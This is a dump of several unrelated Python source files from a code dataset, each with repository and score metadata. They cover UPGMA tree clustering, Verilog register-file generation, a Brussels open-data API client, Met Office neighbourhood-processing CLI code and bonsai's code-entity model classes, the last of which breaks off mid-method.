n.length = d
n.TipLength = d
# combine the two nodes into a new PhyloNode object
new_node = PhyloNode()
new_node.children.append(node1)
new_node.children.append(node2)
node1.parent = new_node
node2.parent = new_node
# replace the object at index1 with the combined node
node_order[index1] = new_node
# replace the object at index2 with None
node_order[index2] = None
return node_order
def UPGMA_cluster(matrix, node_order, large_number):
"""cluster with UPGMA
matrix is a numpy array.
node_order is a list of PhyloNode objects corresponding to the matrix.
large_number will be assigned to the matrix during the process and
should be much larger than any value already in the matrix.
WARNING: Changes matrix in-place.
WARNING: Expects matrix to already have diagonals assigned to large_number
before this function is called.
"""
num_entries = len(node_order)
tree = None
for i in range(num_entries - 1):
smallest_index = find_smallest_index(matrix)
index1, index2 = smallest_index
# if smallest_index is on the diagonal set the diagonal to large_number
if index1 == index2:
matrix[diag([True] * len(matrix))] = large_number
smallest_index = find_smallest_index(matrix)
row_order = condense_node_order(matrix, smallest_index, node_order)
matrix = condense_matrix(matrix, smallest_index, large_number)
tree = node_order[smallest_index[0]]
return tree
def inputs_from_dict_array(darr):
"""makes inputs for UPGMA_cluster from a DictArray object
"""
darr.array += numpy.eye(darr.shape[0]) * BIG_NUM
nodes = list(map(PhyloNode, darr.keys()))
return darr.array, nodes
| 3.140625 | 3 |
src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0 | 5586 | #this code will generate the structural verilog for a single entry in the register file
#takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the
#tristate buffers on the read outputs
#expects the same things as make_store_cell, ensure code is valid there
#<NAME>
#EE 526
#4/20/21
from make_store_cell import make_store_cell
def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num):
#just need to create the correct number of bits
#this and the make_store_array are going to be pretty simple
for bit in range(bits):
make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num)
return
if __name__ == '__main__':
f = open('store_entry_test.txt', 'w')
rows = 4
cols = 2
reads = 2
for row in range(rows):
make_store_entry(f, row, cols, reads, 1, 0)
f.close()
| 2.953125 | 3 |
module1/api.py | oceandelee/tac | 0 | 5587 | """API for AVB"""
import json
import sys
import requests
def actualite_found ():
osm = "https://opendata.bruxelles.be/api/datasets/1.0/search/?q="
data = {
"nhits":0,
"parameters":{
"dataset":"actualites-ville-de-bruxelles",
"timezone":"UTC",
"q":"actualite",
"language": "fr",
"rows":10,
"start":0,
"sort":[
"published"
]
,
"format":"json"
}
,
"records":[]
}
resp = requests.get(osm, data)
if resp.status_code == 200:
print(resp.json()["datasets"][0]["metas"])
else:
print("actualite not found")
return resp
def get_result(resp,n,attribut):
metas = resp.json()["datasets"][n]["metas"]
return metas[attribut]
def nb_result(resp):
return len(resp.json()["datasets"])
#Example of use
if __name__ == "__main__":
resp = actualite_found()
result = get_result(resp,2,"description")
print(result)
print(nb_result(resp)) | 3.09375 | 3 |
improver/cli/nbhood.py | cpelley/improver | 77 | 5588 | <reponame>cpelley/improver
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Script to run neighbourhood processing."""
from improver import cli
from improver.constants import DEFAULT_PERCENTILES
@cli.clizefy
@cli.with_output
def process(
cube: cli.inputcube,
mask: cli.inputcube = None,
*,
neighbourhood_output,
neighbourhood_shape,
radii: cli.comma_separated_list,
lead_times: cli.comma_separated_list = None,
degrees_as_complex=False,
weighted_mode=False,
area_sum=False,
remask=False,
percentiles: cli.comma_separated_list = DEFAULT_PERCENTILES,
halo_radius: float = None,
):
"""Runs neighbourhood processing.
Apply the requested neighbourhood method via the
NeighbourhoodProcessing plugin to a Cube.
Args:
cube (iris.cube.Cube):
The Cube to be processed.
mask (iris.cube.Cube):
A cube to mask the input cube. The data should contain 1 for
usable points and 0 for discarded points.
Only supported with square neighbourhoods. (Optional)
neighbourhood_output (str):
The form of the results generated using neighbourhood processing.
If "probabilities" is selected, the mean probability with a
neighbourhood is calculated. If "percentiles" is selected, then
the percentiles are calculated with a neighbourhood. Calculating
percentiles from a neighbourhood is only supported for a circular
neighbourhood.
Options: "probabilities", "percentiles".
neighbourhood_shape (str):
Name of the neighbourhood method to use. Only a "circular"
neighbourhood shape is applicable for calculating "percentiles"
output.
Options: "circular", "square".
radii (list of float):
The radius or a list of radii in metres of the neighbourhood to
apply.
If it is a list, it must be the same length as lead_times, which
defines at which lead time to use which nbhood radius. The radius
will be interpolated for intermediate lead times.
lead_times (list of int):
The lead times in hours that correspond to the radii to be used.
If lead_times are set, radii must be a list the same length as
lead_times.
degrees_as_complex (bool):
Include this option to process angles as complex numbers.
Not compatible with circular kernel or percentiles.
weighted_mode (bool):
Include this option to set the weighting to decrease with radius.
Otherwise a constant weighting is assumed.
weighted_mode is only applicable for calculating "probability"
neighbourhood output using the circular kernel.
area_sum (bool):
Return sum rather than fraction over the neighbourhood area.
remask (bool):
Include this option to apply the original un-neighbourhood
processed mask to the neighbourhood processed cube.
Otherwise the original un-neighbourhood processed mask
is not applied. Therefore, the neighbourhood processing may result
in values being present in area that were originally masked.
percentiles (float):
Calculates value at the specified percentiles from the
neighbourhood surrounding each grid point. This argument has no
effect if the output is probabilities.
halo_radius (float):
Set this radius in metres to define the excess halo to clip. Used
where a larger grid was defined than the standard grid and we want
to clip the grid back to the standard grid. Otherwise no clipping
is applied.
Returns:
iris.cube.Cube:
A processed Cube.
Raises:
RuntimeError:
If weighted_mode is used with the wrong neighbourhood_output.
RuntimeError:
If degree_as_complex is used with
neighbourhood_output='percentiles'.
RuntimeError:
If degree_as_complex is used with neighbourhood_shape='circular'.
"""
from improver.nbhood import radius_by_lead_time
from improver.nbhood.nbhood import (
GeneratePercentilesFromANeighbourhood,
NeighbourhoodProcessing,
)
from improver.utilities.pad_spatial import remove_cube_halo
from improver.wind_calculations.wind_direction import WindDirection
sum_or_fraction = "sum" if area_sum else "fraction"
if neighbourhood_output == "percentiles":
if weighted_mode:
raise RuntimeError(
"weighted_mode cannot be used with" 'neighbourhood_output="percentiles"'
)
if degrees_as_complex:
raise RuntimeError("Cannot generate percentiles from complex " "numbers")
if neighbourhood_shape == "circular":
if degrees_as_complex:
raise RuntimeError(
"Cannot process complex numbers with circular neighbourhoods"
)
if degrees_as_complex:
# convert cube data into complex numbers
cube.data = WindDirection.deg_to_complex(cube.data)
radius_or_radii, lead_times = radius_by_lead_time(radii, lead_times)
if neighbourhood_output == "probabilities":
result = NeighbourhoodProcessing(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
weighted_mode=weighted_mode,
sum_or_fraction=sum_or_fraction,
re_mask=remask,
)(cube, mask_cube=mask)
elif neighbourhood_output == "percentiles":
result = GeneratePercentilesFromANeighbourhood(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
percentiles=percentiles,
)(cube)
if degrees_as_complex:
# convert neighbourhooded cube back to degrees
result.data = WindDirection.complex_to_deg(result.data)
if halo_radius is not None:
result = remove_cube_halo(result, halo_radius)
return result
| 1.382813 | 1 |
bonsai/model.py | ipa-mirb/bonsai | 0 | 5589 | <gh_stars>0
#Copyright (c) 2017 <NAME>
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
###############################################################################
# Language Model
###############################################################################
class CodeEntity(object):
"""Base class for all programming entities.
All code objects have a file name, a line number, a column number,
a programming scope (e.g. the function or code block they belong to)
and a parent object that should have some variable or collection
holding this object.
"""
def __init__(self, scope, parent):
"""Base constructor for code objects.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
self.scope = scope
self.parent = parent
self.file = None
self.line = None
self.column = None
def walk_preorder(self):
"""Iterates the program tree starting from this object, going down."""
yield self
for child in self._children():
for descendant in child.walk_preorder():
yield descendant
def filter(self, cls, recursive=False):
"""Retrieves all descendants (including self) that are instances
of a given class.
Args:
cls (class): The class to use as a filter.
Kwargs:
recursive (bool): Whether to descend recursively down the tree.
"""
source = self.walk_preorder if recursive else self._children
return [
codeobj
for codeobj in source()
if isinstance(codeobj, cls)
]
def _afterpass(self):
"""Finalizes the construction of a code entity."""
pass
def _validity_check(self):
"""Check whether this object is a valid construct."""
return True
def _children(self):
"""Yield all direct children of this object."""
# The default implementation has no children, and thus should return
# an empty iterator.
return iter(())
def _lookup_parent(self, cls):
"""Lookup a transitive parent object that is an instance
of a given class."""
codeobj = self.parent
while codeobj is not None and not isinstance(codeobj, cls):
codeobj = codeobj.parent
return codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return (' ' * indent) + self.__str__()
def ast_str(self, indent=0):
"""Return a minimal string to print a tree-like structure.
Kwargs:
indent (int): The number of indentation levels.
"""
line = self.line or 0
col = self.column or 0
name = type(self).__name__
spell = getattr(self, 'name', '[no spelling]')
result = ' ({})'.format(self.result) if hasattr(self, 'result') else ''
prefix = indent * '| '
return '{}[{}:{}] {}{}: {}'.format(prefix, line, col,
name, result, spell)
def __str__(self):
"""Return a string representation of this object."""
return self.__repr__()
def __repr__(self):
"""Return a string representation of this object."""
return '[unknown]'
class CodeStatementGroup(object):
"""This class is meant to provide common utility methods for
objects that group multiple program statements together
(e.g. functions, code blocks).
It is not meant to be instantiated directly, only used for
inheritance purposes.
It defines the length of a statement group, and provides methods
for integer-based indexing of program statements (as if using a list).
"""
def statement(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.body.statement(i)
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
try:
return self.statement(i + 1)
except IndexError as e:
return None
def __getitem__(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.statement(i)
def __len__(self):
"""Return the length of the statement group."""
return len(self.body)
# ----- Common Entities -------------------------------------------------------
class CodeVariable(CodeEntity):
"""This class represents a program variable.
A variable typically has a name, a type (`result`) and a value
(or `None` for variables without a value or when the value is unknown).
Additionally, a variable has an `id` which uniquely identifies it in
the program (useful to resolve references), a list of references to it
and a list of statements that write new values to the variable.
If the variable is a *member*/*field*/*attribute* of an object,
`member_of` should contain a reference to such object, instead of `None`.
"""
def __init__(self, scope, parent, id, name, result):
"""Constructor for variables.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this variable.
name (str): The name of the variable in the program.
result (str): The type of the variable in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.value = None
self.member_of = None
self.references = []
self.writes = []
@property
def is_definition(self):
return True
@property
def is_local(self):
"""Whether this is a local variable.
In general, a variable is *local* if its containing scope is a
statement (e.g. a block), or a function, given that the variable
is not one of the function's parameters.
"""
return (isinstance(self.scope, CodeStatement)
or (isinstance(self.scope, CodeFunction)
and self not in self.scope.parameters))
@property
def is_global(self):
"""Whether this is a global variable.
In general, a variable is *global* if it is declared directly under
the program's global scope or a namespace.
"""
return isinstance(self.scope, (CodeGlobalScope, CodeNamespace))
@property
def is_parameter(self):
"""Whether this is a function parameter."""
return (isinstance(self.scope, CodeFunction)
and self in self.scope.parameters)
@property
def is_member(self):
"""Whether this is a member/attribute of a class or object."""
return isinstance(self.scope, CodeClass)
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeEntity):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '{}{} {} = {}'.format(' ' * indent, self.result, self.name,
pretty_str(self.value))
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {} = ({})'.format(self.result, self.name, self.value)
class CodeFunction(CodeEntity, CodeStatementGroup):
"""This class represents a program function.
A function typically has a name, a return type (`result`), a list
of parameters and a body (a code block). It also has an unique `id`
that identifies it in the program and a list of references to it.
If a function is a method of some class, its `member_of` should be
set to the corresponding class.
"""
def __init__(self, scope, parent, id, name, result, definition=True):
"""Constructor for functions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this function.
name (str): The name of the function in the program.
result (str): The return type of the function in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id
self.name = name
self.result = result
self.parameters = []
self.body = CodeBlock(self, self, explicit=True)
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a function definition or just a declaration."""
return self._definition is self
@property
def is_constructor(self):
"""Whether this function is a class constructor."""
return self.member_of is not None
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, (CodeStatement, CodeExpression))
self.body._add(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.parameters:
yield codeobj
for codeobj in self.body._children():
yield codeobj
def _afterpass(self):
"""Assign a function-local index to each child object and register
write operations to variables.
This should only be called after the object is fully built.
"""
if hasattr(self, '_fi'):
return
fi = 0
for codeobj in self.walk_preorder():
codeobj._fi = fi
fi += 1
if isinstance(codeobj, CodeOperator) and codeobj.is_assignment:
if codeobj.arguments and isinstance(codeobj.arguments[0],
CodeReference):
var = codeobj.arguments[0].reference
if isinstance(var, CodeVariable):
var.writes.append(codeobj)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
params = ', '.join(map(lambda p: p.result + ' ' + p.name,
self.parameters))
if self.is_constructor:
pretty = '{}{}({}):\n'.format(spaces, self.name, params)
else:
pretty = '{}{} {}({}):\n'.format(spaces, self.result,
self.name, params)
if self._definition is not self:
pretty += spaces + ' [declaration]'
else:
pretty += self.body.pretty_str(indent + 2)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
params = ', '.join(map(str, self.parameters))
return '[{}] {}({})'.format(self.result, self.name, params)
class CodeClass(CodeEntity):
"""This class represents a program class for object-oriented languages.
A class typically has a name, an unique `id`, a list of
members (variables, functions), a list of superclasses, and a list of
references.
If a class is defined within another class (inner class), it should
have its `member_of` set to the corresponding class.
"""
def __init__(self, scope, parent, id_, name, definition=True):
"""Constructor for classes.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
id: An unique identifier for this class.
name (str): The name of the class in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.id = id_
self.name = name
self.members = []
self.superclasses = []
self.member_of = None
self.references = []
self._definition = self if definition else None
@property
def is_definition(self):
"""Whether this is a definition or a declaration of the class."""
return self._definition is self
def _add(self, codeobj):
"""Add a child (function, variable, class) to this object."""
assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass))
self.members.append(codeobj)
codeobj.member_of = self
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.members:
yield codeobj
def _afterpass(self):
"""Assign the `member_of` of child members and call
their `_afterpass()`.
This should only be called after the object is fully built.
"""
for codeobj in self.members:
if not codeobj.is_definition:
if not codeobj._definition is None:
codeobj._definition.member_of = self
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'class ' + self.name
if self.superclasses:
superclasses = ', '.join(self.superclasses)
pretty += '(' + superclasses + ')'
pretty += ':\n'
if self.members:
pretty += '\n\n'.join(
c.pretty_str(indent + 2)
for c in self.members
)
else:
pretty += spaces + ' [declaration]'
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[class {}]'.format(self.name)
class CodeNamespace(CodeEntity):
"""This class represents a program namespace.
A namespace is a concept that is explicit in languages such as C++,
but less explicit in many others. In Python, the closest thing should
be a module. In Java, it may be the same as a class, or non-existent.
A namespace typically has a name and a list of children objects
(variables, functions or classes).
"""
def __init__(self, scope, parent, name):
"""Constructor for namespaces.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the namespace in the program.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}namespace {}:\n'.format(spaces, self.name)
pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children)
return pretty
def __repr__(self):
"""Return a string representation of this object."""
return '[namespace {}]'.format(self.name)
class CodeGlobalScope(CodeEntity):
"""This class represents the global scope of a program.
The global scope is the root object of a program. If there are no
better candidates, it is the `scope` and `parent` of all other objects.
It is also the only object that does not have a `scope` or `parent`.
"""
def __init__(self):
"""Constructor for global scope objects."""
CodeEntity.__init__(self, None, None)
self.children = []
def _add(self, codeobj):
"""Add a child (namespace, function, variable, class) to this object."""
assert isinstance(codeobj, (CodeNamespace, CodeClass,
CodeFunction, CodeVariable))
self.children.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.children:
yield codeobj
def _afterpass(self):
"""Call the `_afterpass()` of child objects.
This should only be called after the object is fully built.
"""
for codeobj in self.children:
codeobj._afterpass()
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return '\n\n'.join(
codeobj.pretty_str(indent=indent)
for codeobj in self.children
)
# ----- Expression Entities ---------------------------------------------------
class CodeExpression(CodeEntity):
"""Base class for expressions within a program.
Expressions can be of many types, including literal values,
operators, references and function calls. This class is meant
to be inherited from, and not instantiated directly.
An expression typically has a name (e.g. the name of the function
in a function call) and a type (`result`). Also, an expression should
indicate whether it is enclosed in parentheses.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for expressions.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the expression in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeEntity.__init__(self, scope, parent)
self.name = name
self.result = result
self.parenthesis = paren
@property
def function(self):
"""The function where this expression occurs."""
return self._lookup_parent(CodeFunction)
@property
def statement(self):
"""The statement where this expression occurs."""
return self._lookup_parent(CodeStatement)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return (' ' * indent) + '(' + self.name + ')'
return (' ' * indent) + self.name
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {}'.format(self.result, self.name)
class SomeValue(CodeExpression):
"""This class represents an unknown value for diverse primitive types."""
def __init__(self, result):
"""Constructor for unknown values."""
CodeExpression.__init__(self, None, None, result, result)
def _children(self):
"""Yield all the children of this object, that is no children."""
return iter(())
SomeValue.INTEGER = SomeValue("int")
SomeValue.FLOATING = SomeValue("float")
SomeValue.CHARACTER = SomeValue("char")
SomeValue.STRING = SomeValue("string")
SomeValue.BOOL = SomeValue("bool")
class CodeLiteral(CodeExpression):
"""Base class for literal types not present in Python.
This class is meant to represent a literal whose type is not numeric,
string or boolean, as bare Python literals are used for those.
A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`),
and could be enclosed in parentheses. It does not have a name.
"""
def __init__(self, scope, parent, value, result, paren=False):
"""Constructor for literals.
As literals have no name, a constant string is used instead.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (CodeExpression|CodeExpression[]): This literal's value.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, 'literal', result, paren)
self.value = value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.parenthesis:
return '{}({})'.format(' ' * indent, pretty_str(self.value))
return pretty_str(self.value, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {!r}'.format(self.result, self.value)
CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue,
CodeLiteral, CodeExpression)
CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral)
class CodeNull(CodeLiteral):
"""This class represents an indefinite value.
Many programming languages have their own version of this concept:
Java has null references, C/C++ NULL pointers, Python None and so on.
"""
def __init__(self, scope, parent, paren=False):
"""Constructor for null literals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
paren (bool): Whether the null literal is enclosed in parentheses.
"""
CodeLiteral.__init__(self, scope, parent, None, 'null', paren)
def _children(self):
"""Yield all the children of this object, that is no children.
This class inherits from CodeLiteral just for consistency with the
class hierarchy. It should have no children, thus an empty iterator
is returned.
"""
return iter(())
class CodeCompositeLiteral(CodeLiteral):
"""This class represents a composite literal.
A composite literal is any type of literal whose value is compound,
rather than simple. An example present in many programming languages
are list literals, often constructed as `[1, 2, 3]`.
A composite literal has a sequence of values that compose it
(`values`), a type (`result`), and it should indicate whether it is
enclosed in parentheses.
"""
def __init__(self, scope, parent, result, value=(), paren=False):
"""Constructor for a compound literal.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (iterable): The initial value sequence in this composition.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
try:
value = list(value)
except TypeError as te:
raise AssertionError(str(te))
CodeLiteral.__init__(self, scope, parent, value, result, paren)
@property
def values(self):
return tuple(self.value)
def _add_value(self, child):
"""Add a value to the sequence in this composition."""
self.value.append(child)
def _children(self):
"""Yield all direct children of this object."""
for value in self.value:
if isinstance(value, CodeEntity):
yield value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
values = '{{{}}}'.format(', '.join(map(pretty_str, self.value)))
if self.parenthesis:
return '{}({})'.format(indent, values)
return '{}{}'.format(indent, values)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {{{}}}'.format(self.result,
', '.join(map(repr, self.value)))
class CodeReference(CodeExpression):
"""This class represents a reference expression (e.g. to a variable).
A reference typically has a name (of what it is referencing),
and a return type.
If the referenced entity is known, `reference` should be set.
If the reference is a field/attribute of an object, `field_of`
should be set to that object.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for references.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the reference in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the reference is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.field_of = None
self.reference = None
def _set_field(self, codeobj):
"""Set the object that contains the attribute this is a reference of."""
assert isinstance(codeobj, CodeExpression)
self.field_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.field_of:
yield self.field_of
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
name = ('{}.{}'.format(self.field_of.pretty_str(), self.name)
if self.field_of else self.name)
return pretty.format(spaces, name)
def __str__(self):
"""Return a string representation of this object."""
return '#' + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.field_of:
return '[{}] ({}).{}'.format(self.result, self.field_of, self.name)
return '[{}] #{}'.format(self.result, self.name)
class CodeOperator(CodeExpression):
"""This class represents an operator expression (e.g. `a + b`).
Operators can be unary or binary, and often return numbers
or booleans. Some languages also support ternary operators.
Do note that assignments are often considered expressions,
and, as such, assignment operators are included here.
An operator typically has a name (its token), a return type,
and a tuple of its arguments.
"""
_UNARY_TOKENS = ("+", "-")
_BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=",
"==", "!=", "&&", "||", "=")
def __init__(self, scope, parent, name, result, args=None, paren=False):
"""Constructor for operators.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the operator in the program.
result (str): The return type of the operator in the program.
Kwargs:
args (tuple): Initial tuple of arguments.
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.arguments = args or ()
@property
def is_unary(self):
"""Whether this is a unary operator."""
return len(self.arguments) == 1
@property
def is_binary(self):
"""Whether this is a binary operator."""
return len(self.arguments) == 2
@property
def is_ternary(self):
"""Whether this is a ternary operator."""
return len(self.arguments) == 3
@property
def is_assignment(self):
"""Whether this is an assignment operator."""
return self.name == "="
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
if self.is_unary:
operator = self.name + pretty_str(self.arguments[0])
else:
operator = '{} {} {}'.format(pretty_str(self.arguments[0]),
self.name,
pretty_str(self.arguments[1]))
return pretty.format(indent, operator)
def __repr__(self):
"""Return a string representation of this object."""
if self.is_unary:
return '[{}] {}({})'.format(self.result, self.name,
self.arguments[0])
if self.is_binary:
return '[{}] ({}){}({})'.format(self.result, self.arguments[0],
self.name, self.arguments[1])
return '[{}] {}'.format(self.result, self.name)
class CodeFunctionCall(CodeExpression):
"""This class represents a function call.
A function call typically has a name (of the called function),
a return type, a tuple of its arguments and a reference to the
called function.
If a call references a class method, its `method_of` should be
set to the object on which a method is being called.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for function calls.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the function in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.full_name = name
self.arguments = ()
self.method_of = None
self.reference = None
@property
def is_constructor(self):
"""Whether the called function is a constructor."""
return self.result == self.name
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _set_method(self, codeobj):
"""Set the object on which a method is called."""
assert isinstance(codeobj, CodeExpression)
self.method_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.method_of:
yield self.method_of
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
args = ', '.join(map(pretty_str, self.arguments))
if self.method_of:
call = '{}.{}({})'.format(self.method_of.pretty_str(),
self.name, args)
elif self.is_constructor:
call = 'new {}({})'.format(self.name, args)
else:
call = '{}({})'.format(self.name, args)
